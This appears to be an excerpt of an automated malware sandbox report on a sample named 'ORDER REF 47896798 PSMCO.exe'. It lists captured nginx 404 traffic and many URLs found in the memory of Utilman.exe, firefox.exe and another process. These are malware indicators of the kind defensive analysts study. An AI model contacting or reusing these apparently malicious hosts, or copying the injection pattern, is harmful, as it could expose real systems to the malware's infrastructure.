4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:03:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:03:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 14:03:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2121105740.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: ORDER REF 47896798 PSMCO.exeString found in binary or memory: http://tempuri.org/WarehouseDataDataSet.xsdYhttp://tempuri.org/WarehouseDataDataSet1.xsdEkursachForA
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.2023kuanmeiyingzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3xzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3xzhibo.net/binding
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.69meinvzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.accac.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/rdtl/
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/bl.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/broadcast.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/index.umd.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/js.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anxinzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.assetsecurity.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babazhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bachazhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beautyconcepts.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=322965365273
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bolezhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.canaille.net
